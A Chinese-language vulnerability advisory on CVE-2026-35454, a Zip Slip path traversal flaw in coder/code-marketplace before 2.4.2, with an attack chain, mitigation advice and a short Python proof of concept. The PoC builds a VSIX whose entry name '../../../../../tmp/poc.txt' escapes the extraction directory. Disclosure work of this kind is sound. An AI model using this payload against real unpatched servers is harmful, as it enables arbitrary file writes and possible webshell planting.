CVE-2026-35454 CVSS 6.5 中危

CVE-2026-35454 code-marketplace Zip Slip漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35454

漏洞类型

Zip Slip (路径遍历)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

coder/code-marketplace

漏洞概述

Code Extension Marketplace 是 VS Code Marketplace 的开源替代品。在 2.4.2 版本之前，该产品存在 Zip Slip 漏洞。攻击者可利用恶意的 VSIX 文件，通过构造包含路径遍历字符的文件名，绕过解压路径限制，将文件写入扩展目录之外的任意位置。该漏洞源于代码未对归档条目名称进行充分的边界检查，可能导致任意文件写入。

技术细节

该漏洞位于 `coder/code-marketplace` 的 `ExtractZip` 函数逻辑中。在解压 VSIX（ZIP格式）文件时，系统直接将 ZIP 条目中的原始文件名传递给写入回调函数，并使用 `filepath.Join` 将其与基础路径拼接。尽管 `filepath.Join` 能够解析路径中的 `..` 组件以规范化路径，但它并未在最终拼接后检查结果路径是否仍处于预期的基准目录边界内。因此，攻击者可以构造包含 `../../` 序列的恶意文件名。当服务端解压此恶意文件时，系统会错误地将文件写入到上级目录甚至系统根目录，从而实现任意文件写入。此漏洞可能导致敏感配置文件被篡改或覆盖，进而威胁服务器安全。

攻击链分析

STEP 1

侦察

攻击者识别出目标使用的是低于 2.4.2 版本的 coder/code-marketplace。

STEP 2

武器化

攻击者创建一个恶意的 VSIX 扩展包，其中包含带有路径遍历字符（如 ../../）的文件名。

STEP 3

投递

攻击者将恶意 VSIX 文件上传到 Code Extension Marketplace。

STEP 4

利用

目标服务器处理上传的文件，调用 `ExtractZip` 进行解压。由于缺乏边界检查，文件被写入预期目录之外。

STEP 5

影响

任意文件被写入服务器磁盘，可能覆盖系统配置或写入 Webshell，导致完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import zipfile
import os

def create_malicious_vsix(output_filename):
    """
    Creates a malicious VSIX file demonstrating the Zip Slip vulnerability.
    The file contains an entry with path traversal sequences ('../').
    """
    with zipfile.ZipFile(output_filename, 'w') as zf:
        # Construct a path that escapes the extraction directory
        malicious_path = "../../../../../tmp/poc.txt"
        
        # Write arbitrary content to the malicious path
        zf.writestr(malicious_path, b"This file was written via Zip Slip vulnerability.")
        
    print(f"[+] Malicious VSIX file created: {output_filename}")
    print(f"[+] Payload path: {malicious_path}")

if __name__ == "__main__":
    create_malicious_vsix("exploit.vsix")

影响范围

coder/code-marketplace < 2.4.2

防御指南

临时缓解措施

建议立即检查并更新所有受影响的 code-marketplace 实例至 2.4.2 版本。如果无法立即升级，应实施网络隔离，禁止上传未经验证的扩展包，或在沙箱环境中运行解压服务，以防止路径遍历攻击波及宿主机系统文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表